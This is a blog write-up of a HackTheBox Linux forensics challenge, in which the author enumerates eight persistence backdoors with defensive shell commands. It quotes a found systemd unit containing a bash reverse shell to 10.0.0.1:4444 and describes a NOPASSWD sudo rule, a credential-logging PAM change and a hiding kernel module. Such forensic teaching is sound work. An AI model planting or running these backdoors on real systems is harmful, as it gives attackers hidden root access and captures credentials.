PersistenceIsFutile | HTB Forensics (Moderate)

9 September 2025 | 3 min read | justruss.tech

PersistenceIsFutile is a Moderate-difficulty HackTheBox forensics challenge. The scenario is a compromised Linux production server. The IR team found eight backdoors before going offline, documented nothing useful, and left you to clean the machine. No hints about what the backdoors are or where they are hiding.

Methodology

Finding eight unknown backdoors on a Linux system requires systematic enumeration of persistence mechanisms rather than hunting for specific things. Start broad and work toward the subtle.

The first four: obvious locations

# New user accounts: anything with a real login shell that is not root
grep -v "nologin\|false" /etc/passwd | grep -v "^root"
# backdoor:x:1001:1001::/home/backdoor:/bin/bash

# Cron jobs across all users, plus the system-wide cron files and drop-in directory
for user in $(cut -d: -f1 /etc/passwd); do crontab -u "$user" -l 2>/dev/null; done
cat /etc/crontab /etc/cron.d/* /var/spool/cron/crontabs/* 2>/dev/null
# Entry running /tmp/.hidden/update.sh every minute

# SSH authorized_keys
find /home /root -name authorized_keys 2>/dev/null -exec cat {} \;
# Unexpected public key in /root/.ssh/authorized_keys

# Sudo rules
cat /etc/sudoers /etc/sudoers.d/*
# www-data ALL=(ALL) NOPASSWD: ALL

The sudo rule giving www-data full root access with no password is particularly dangerous. Any webshell running as www-data has an instant root escalation path.

The next four: less obvious

# SUID binaries in unexpected locations
find / -perm -4000 -type f 2>/dev/null | grep -v "^/usr/bin\|^/usr/sbin\|^/bin\|^/sbin"
# /opt/support/updater  (opens a reverse shell when executed, runs as root via SUID)

# Systemd service units modified recently
find /etc/systemd /usr/lib/systemd -name "*.service" -newer /etc/hostname 2>/dev/null
# /etc/systemd/system/network-check.service

cat /etc/systemd/system/network-check.service
# ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'

# PAM configuration
grep -r "pam_exec\|requisite\|sufficient" /etc/pam.d/ | grep -v "^#"
# Modified /etc/pam.d/common-auth logging credentials to /var/log/.syslog

# Kernel modules: anything loaded that modinfo cannot resolve under /lib/modules
lsmod | awk 'NR > 1 {print $1}' | while read -r mod; do
    if ! modinfo "$mod" 2>/dev/null | grep -q "^filename:"; then
        echo "Suspicious: $mod"
    fi
done
# netfilter_helper is loaded but modinfo cannot find it (not from any installed package)

The kernel module was hooking the getdents syscall to hide its own files from directory listings. That is why the hidden cron script and hidden syslog file were not visible in simple ls output.

Key takeaway

Persistence hunting on Linux is an enumeration problem. Comparing installed binaries against their package checksums and watching for recently modified files in system directories catches a lot of what manual inspection misses. The attackers who are hardest to find use modified legitimate files rather than new ones and names that closely resemble legitimate system components.